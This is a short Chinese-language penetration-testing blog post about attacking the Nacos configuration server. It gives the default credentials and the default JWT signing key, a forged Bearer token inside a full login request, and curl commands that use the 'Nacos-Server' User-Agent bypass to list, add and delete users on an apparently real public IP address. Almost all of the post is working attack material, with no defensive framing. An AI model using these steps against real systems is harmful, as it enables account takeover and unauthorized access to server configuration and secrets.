nacos

nacos 工具使用

弱口令

可以多尝试一下

nacos/nacos

身份伪造

nacos 默认生成的key

nacos默认key(token.secret.key值的位置在conf下的application.properties)
SecretKey012345678901234567890123456789012345678901234567890123456789

1
2
3
4
5
JWT DATA:
{
  "sub": "nacos",
  "exp": 1682308800
}

然后替换secretKey

image-20240720094451430

然后随便输入密码

在发送用户和面密码的数据包中替换jwt 然后他会返回一个数据包,再使用这个拦截返回包的方式,替换返回包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /v1/auth/users/login HTTP/1.1
Host: 101.42.21.9
Content-Length: 29
Pragma: no-cache
Cache-Control: no-cache	
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 uacq
Content-Type: application/x-www-form-urlencoded
Origin: http://101.42.21.9
Referer: http://101.42.21.9/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDkzNjAyMH0.b2Qruw41JqKA5u5hNcwxjlLxMbP98fznXy9y2oF7Xxo

username=nacos&password=nacos

未授权

1
2
3
4
5
6
7
8
9
10
11
12
13
/v1/auth/users?pageNo=1&pageSize=10 可查看到用户列表
curl -X POST 'http://101.42.21.9/v1/auth/users?username=shangxin&password=shangxin'
-H 'User-Agent: Nacos-Server' 添加用户

/v1/auth/users
username=shangxin&password=shangxin
User-Agent:Nacos-Server

查看用户是否添加成功:
/v1/auth/search?username=shangxin
curl 'http://101.42.21.9/v1/auth/search?username=shangxin'
删除用户
curl -X DELETE "http://101.42.21.9/v1/auth/users?username=shangxin"
#渗透
nacos
https://tsy244.github.io/2024/07/19/渗透/nacos/
Author
August Rosenberg
Posted on
July 19, 2024
Licensed under